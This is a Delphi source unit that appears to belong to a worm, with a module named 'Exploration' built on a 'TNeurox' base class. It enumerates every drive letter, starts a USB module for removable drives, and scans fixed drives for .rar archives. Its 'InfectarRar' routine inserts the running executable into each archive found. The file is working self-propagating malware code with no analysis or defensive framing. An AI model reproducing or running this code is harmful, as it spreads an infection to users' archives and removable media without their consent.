unit Exploration;

interface

uses ModuleNeurox, Windows, USB, Search, Classes, ModuleRar;

  type
    TExplorerModule = class(TNeurox)
       private
          FDrive : char;
          FUSB : TModuleUSB;
          FSearch: TSearch;
          FRar: TRarModule;
       public
          constructor Create; reintroduce;
          function DriveExists : boolean;
          procedure Search;
          procedure InfectarRar(FileName: string);
    end;

implementation

constructor TExplorerModule.Create;
begin
  inherited Create(True);
  FreeOnTerminate:= true;
  FRar:= TRarModule.Create;
  Search();
end;

procedure TExplorerModule.InfectarRar(FileName: string);
var
s: TStringList;
begin
  if FRar.RarInstalled = true then
    begin
       s:= TStringList.Create;
       s.Add(paramstr(0));
       FRar.UpdateRarFile(Filename, s);
    end;
end;

function TExplorerModule.DriveExists: boolean;
var
VolSerNum, Dummy1, Dummy2: DWORD;
begin
    try
          result:=GetVolumeInformation(pchar(FDrive + ':\'), NIL, 0, @VolSerNum, Dummy1, Dummy2, NIL, 0);
    except
        result:=false;
    end;
end;


procedure TExplorerModule.Search;
var
UDrive: char;
Uni: string;
begin
  for UDRive := 'a' to 'z' do
      begin
        FDrive:= UDrive;
        Uni:= FDrive + ':\';

                  if (GetDriveType(pchar(FDrive + ':\')) = DRIVE_REMOVABLE) and (DriveExists = true) then begin
                    FUSB:= TModuleUSB.Create(Uni);
                  end;
                  if (GetDriveType(pchar(FDrive + ':\')) = DRIVE_FIXED) and (DriveExists = true) then begin
                    FSearch:= TSearch.Create;
                    FSearch.OnFindFile:= InfectarRar;
                    FSearch.FindFiles(Uni, '*.rar');
                  end;
          end;
      end;



end.

